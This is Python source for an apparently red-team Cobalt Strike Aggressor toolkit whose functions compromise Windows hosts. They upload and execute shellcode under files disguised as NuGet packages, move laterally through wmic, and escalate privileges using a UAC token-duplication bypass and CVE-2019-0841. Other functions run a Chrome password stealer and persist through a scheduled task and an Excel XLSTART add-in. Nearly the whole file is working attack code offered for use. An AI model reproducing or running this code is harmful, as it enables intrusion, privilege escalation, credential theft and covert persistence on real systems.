def elevate_shellcode_helper(bid, shellcode, function):
"""
Execute `shellcode` with a helper using <function> -Binary helper.exe -Arguments <shellcode>
"""
native_helper = utils.basedir('tools/native.exe')
native_helper_remote = r'{}\NugetPackage.exe'.format(
helpers.guess_temp(bid))
shellcode_remote = r'{}\nuget.package'.format(helpers.guess_temp(bid))
# delete first
aggressor.brm(bid, native_helper_remote, silent=True)
aggressor.brm(bid, shellcode_remote, silent=True)
# upload
helpers.upload_to(bid, native_helper, native_helper_remote, silent=True)
helpers.upload_to(bid, shellcode, shellcode_remote, silent=True)
# invoke
command = '{} {}'.format(native_helper_remote, shellcode_remote)
function(bid, command)
# clean up
aggressor.brm(bid, native_helper_remote, silent=True)
aggressor.brm(bid, shellcode_remote, silent=True)
def lateral_wmi_shellcode(bid, host, shellcode, user=None, password=None):
native_helper = utils.basedir('tools/native.exe')
temp_relative = 'WINDOWS'
temp_remote = r'\\{}\C$\{}'.format(host, temp_relative)
temp_local = r'C:\{}'.format(temp_relative)
native_helper_relative = 'NugetPackage.{}.exe'.format(helpers.randstr())
native_helper_remote = r'{}\{}'.format(temp_remote, native_helper_relative)
native_helper_local = r'{}\{}'.format(temp_local, native_helper_relative)
shellcode_relative = r'nuget.{}.package'.format(helpers.randstr())
shellcode_remote = r'{}\{}'.format(temp_remote, shellcode_relative)
shellcode_local = r'{}\{}'.format(temp_local, shellcode_relative)
# upload
helpers.upload_to(bid, native_helper, native_helper_remote, silent=True)
helpers.upload_to(bid, shellcode, shellcode_remote, silent=True)
# call it
remote_command = '{} {}'.format(native_helper_local, shellcode_local)
# TODO user/pass
local_command = 'echo "{host}" & wmic /node:"{host}" '.format(host=host)
if user or password:
local_command += ' /user:{user} /password:{password} '.format(user=user, password=password)
local_command += 'process call create "{command}","{cwd}"'.format(host=host, command=remote_command, cwd=temp_local)
aggressor.bshell(bid, local_command)
def elevate_runas_shellcode(bid, user, password, shellcode):
"""
Elevate with token duplication bypass. Execute `shellcode` with a helper.
"""
native_helper = utils.basedir('tools/native.exe')
native_helper_remote = r'{}\NugetPackage.{}.exe'.format(
helpers.guess_temp(bid), helpers.randstr())
shellcode_remote = r'{}\nuget2.package'.format(helpers.guess_temp(bid))
# delete first
aggressor.brm(bid, native_helper_remote, silent=True)
aggressor.brm(bid, shellcode_remote, silent=True)
aggressor.blog2(
bid, 'uploading to {} and {}'.format(native_helper_remote,
shellcode_remote))
# upload
helpers.upload_to(bid, native_helper, native_helper_remote, silent=True)
helpers.upload_to(bid, shellcode, shellcode_remote, silent=True)
if '\\' in user:
domain, user = user.split('\\')
else:
raise RuntimeError('must specify user domain')
# invoke
aggressor.brunas(bid, domain, user, password, native_helper_remote)
# clean up
aggressor.brm(bid, native_helper_remote, silent=True)
aggressor.brm(bid, shellcode_remote, silent=True)
def _(bid):
global _uploaded
temp = helpers.guess_temp(bid)
dest = r'{}\7za.exe'.format(temp)
helpers.upload_to(bid, utils.basedir('tools/7za.exe'), dest)
helpers.explorer_stomp(bid, '7za.exe')
_uploaded = dest
def _(bid):
#temp = r'{}\AppData\Local'.format(helpers.guess_home(bid))
temp = r'{}'.format(helpers.guess_home(bid))
out_file = r'{}\c'.format(temp)
dest = r'{}\temp.exe'.format(temp)
helpers.upload_to(bid, utils.basedir('tools/chrome-passwords.exe'), dest)
aggressor.bshell(
bid,
r'{} > {} & echo "Chrome credentials ready at {}. Run grab-chrome-next"'
.format(cmd_quote(dest), cmd_quote(out_file), out_file))
def elevate_cve_2019_0841(bid, target, overwrite=None):
r"""
Elevate with CVE-2019-0841. Change permissions of 'target'. Optionally
overwrite 'target' with 'overwrite'.
Good overwrite options:
- C:\Program Files\LAPS\CSE\AdmPwd.dll (then run gpupdate)
- C:\Program Files (x86)\Google\Update\1.3.34.7\psmachine.dll (then wait for google update or run it manually)
"""
native_hardlink_ps1 = utils.basedir('powershell/Native-HardLink.ps1')
edge_dir = r'$env:localappdata\Packages\Microsoft.MicrosoftEdge_*'
settings_dat = r'\Settings\settings.dat'
command = helpers.code_string(r"""
# Stop Edge
echo "[.] Stopping Edge"
$process = Get-Process -Name MicrosoftEdge 2>$null
if ($process) {{
$process | Stop-Process
}}
sleep 3
# Hardlink
$edge_dir = Resolve-Path {edge_dir}
$settings_dat = $edge_dir.Path + '{settings_dat}'
echo "[.] Making Hardlink from $settings_dat to {target}"
rm $settings_dat
Native-HardLink -Verbose -Link $settings_dat -Target {target}
# Start Edge
echo "[.] Starting Edge"
Start Microsoft-Edge:
sleep 3
# Stop it again
echo "[.] Stopping Edge"
$process = Get-Process -Name MicrosoftEdge 2>$null
if ($process) {{
$process | Stop-Process
}}
echo "[+] All Finished!"
echo "[.] New ACLs:"
Get-Acl {target} | Format-List
""".format(edge_dir=edge_dir,
settings_dat=settings_dat,
target=powershell_quote(target)))
aggressor.bpowershell_import(bid, native_hardlink_ps1, silent=True)
aggressor.bpowerpick(bid, command, silent=True)
if overwrite:
helpers.upload_to(bid, overwrite, target)
helpers.explorer_stomp(bid, target)
def _(bid, shellcode):
local_helper = utils.basedir('tools/native_persist.exe')
appdata = helpers.guess_appdata(bid)
nuget_dir = r'{}\NuGet'.format(appdata)
remote_helper = r'{}\NugetManager.exe'.format(nuget_dir)
aggressor.bmkdir(bid, nuget_dir)
helpers.upload_to(bid, shellcode, r'{}\nuget.package'.format(nuget_dir))
helpers.upload_to(bid, local_helper, remote_helper)
aggressor.bshell(
bid, 'schtasks /create /f /tn NugetUpdate /sc daily /tr {}'.format(
remote_helper))
def elevate_token_shellcode_csharp(bid, shellcode):
"""
Elevate with token duplication bypass. Execute `shellcode` with a C# helper.
"""
aggressor.bpowershell_import(
bid, utils.basedir('modules/FilelessUACBypass.ps1'))
execute_shellcode = utils.basedir('tools/execute_shellcode.exe')
execute_assembly = utils.basedir('tools/execute_assembly.exe')
stage1 = r'{}\NugetPackage.exe'.format(helpers.guess_temp(bid))
#stage2 = r'{}\nuget_update.package'.format(helpers.guess_temp(bid))
stage2 = r'{}\Stage2.exe'.format(helpers.guess_temp(bid))
package = r'{}\nuget.package'.format(helpers.guess_temp(bid))
helpers.upload_to(bid, execute_assembly, stage1)
helpers.upload_to(bid, execute_shellcode, stage2)
helpers.upload_to(bid, shellcode, package)
command = 'Invoke-TokenDuplication -Binary {}'.format(
powershell_quote(stage2))
aggressor.bpowerpick(bid, command)
aggressor.brm(bid, stage1)
aggressor.brm(bid, stage2)
aggressor.brm(bid, package)
def _(bid, xlam):
appdata = helpers.guess_appdata(bid)
templates = r'{}\Microsoft\Templates'.format(appdata)
aggressor.bmkdir(bid, user_xlstart)
helpers.upload_to(bid, xlam, r'{}\module.xlam'.format(user_xlstart))
def _(bid, xlam):
appdata = helpers.guess_appdata(bid)
user_xlstart = r'{}\Microsoft\Excel\XLSTART'.format(appdata)
aggressor.bmkdir(bid, user_xlstart)
helpers.upload_to(bid, xlam, r'{}\module.xlam'.format(user_xlstart))
def _(bid, local_file, remote_file):
helpers.upload_to(bid, local_file, remote_file)
